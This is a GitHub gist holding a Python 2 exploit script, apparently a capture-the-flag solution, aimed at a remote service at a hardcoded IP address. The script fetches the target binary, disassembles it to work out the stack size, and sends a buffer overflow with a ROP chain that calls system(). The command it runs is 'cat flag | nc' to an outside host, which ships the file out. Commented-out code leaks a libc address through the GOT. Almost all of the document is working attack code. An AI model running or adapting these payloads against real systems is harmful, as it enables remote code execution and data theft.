Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created September 21, 2015 02:38
Show Gist options
  • Save peternguyen93/6a53ee3596ff89233710 to your computer and use it in GitHub Desktop.
Save peternguyen93/6a53ee3596ff89233710 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
import socket
import re
from capstone import *
from Pwn import *
import sys
# p = Pwn(mode=1,host='52.20.10.244',port=12351)
def disas(code):
asm = ''
md = Cs(CS_ARCH_X86, CS_MODE_64)
for i in md.disasm(code, 0x1000):
asm += i.op_str
return asm
def getPortSize():
p3 = Pwn(host='52.20.10.244',port=8888)
p3.connect()
bytes = ''
d = p3.recv(1024)
while 1:
if len(d) > 0:
bytes += d
else:
break
d = p3.recv(1024)
port = p3.unpack(bytes[0x7d5:0x7d5 + 4])
size = p3.unpack(bytes[0x82f:0x82f + 4])
asm = disas(bytes[0x824:0x824+7])
# print asm
_match = re.match(r'rcx, qword ptr \[rbp - ([0-9a-fx]*)\]',asm)
stack_size = int(_match.group(1),16)
p3.close()
return port,size,stack_size,bytes
def getshell(p2,stack_size,system_addr,addr):
payload = 'cat flag | nc 128.199.171.28 8001;'
payload+= 'A'*(stack_size - 8 - len(payload)) + p2.p32(0x6) + 'AAAA' + 'C'*8
rop = [
0x4008d3, # pop rdi ; ret
addr,
system_addr
]
# rop = [
# 0x4008d3, # pop rdi ; ret
# 0x6,
# 0x04008d1, # pop rsi ; pop r15 ; ret
# addr,
# 0x41414141,
# 0x4005e0, # write
# 0x40077D, # main
# ]
payload += p2.pA(rop)
p2.send(payload)
# leak = p2.recv(1024)
# print leak
# leak = p2.recv(1024)
# print repr(leak)
p2.io()
def leak(p1,stack_size):
payload = 'A'*(stack_size - 8) + p1.p32(0x6) + 'AAAA' + 'C'*8
rop = [
0x4008d3, # pop rdi ; ret
0x6,
0x04008d1, # pop rsi ; pop r15 ; ret
p1.got('listen'),
0x41414141,
0x4005e0, # write
0x40077D, # main
]
payload += p1.pA(rop)
# f = open('bin.pl','w')
# f.write(payload)
# f.close()
p1.send(payload)
leak = p1.recv(1024)
leak = p1.recv(1024)
print repr(leak)
listen_addr = 0
# if leak != '':
# listen_addr = p1.unpack(leak[:8])
return listen_addr
def exploit():
system_addr = 0x7ffff7a5b640
start = 0x7fffffffebc0 + 16
# isFound = True
# it_time = False
while 1:
try:
_port,size,stack_size,bytes = getPortSize()
print '[+] Bot at :',_port
print '[+] Recv size:',size
print '[+] Stack size:',stack_size
# if isFound: # get shell time
if (stack_size + 24) > size:
print 'Can\'t overflow'
continue
else:
# print '[!!!!]',hex(start)
p2 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
p2.connect()
getshell(p2,stack_size,system_addr,start)
# break
# if (stack_size + 56) > size:
# print 'Can\'t overflow'
# continue
# # f = open('./bin.elf','w')
# # f.write(bytes)
# # f.close()
# p1 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
# p1.connect()
# # p2 = Pwn(mode=1,host='52.20.10.244',port=42462,pfile='./bin.elf')
# listen_addr = leak(p1,stack_size)
# if listen_addr != 0:
# system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')
# # # bin_sh_addr = system_addr + 0x13669b
# print '[+] listen()',hex(listen_addr)
# print '[+] system()',hex(system_addr)
# # print '[+] "/bin/sh":',hex(bin_sh_addr)
# isFound = True
except AttributeError:
print 'Suck ___^____^___'
except socket.error:
print 'Fuck.........'
# system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')
# print '[+] listen()',hex(listen_addr)
# print '[+] system()',hex(system_addr)
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment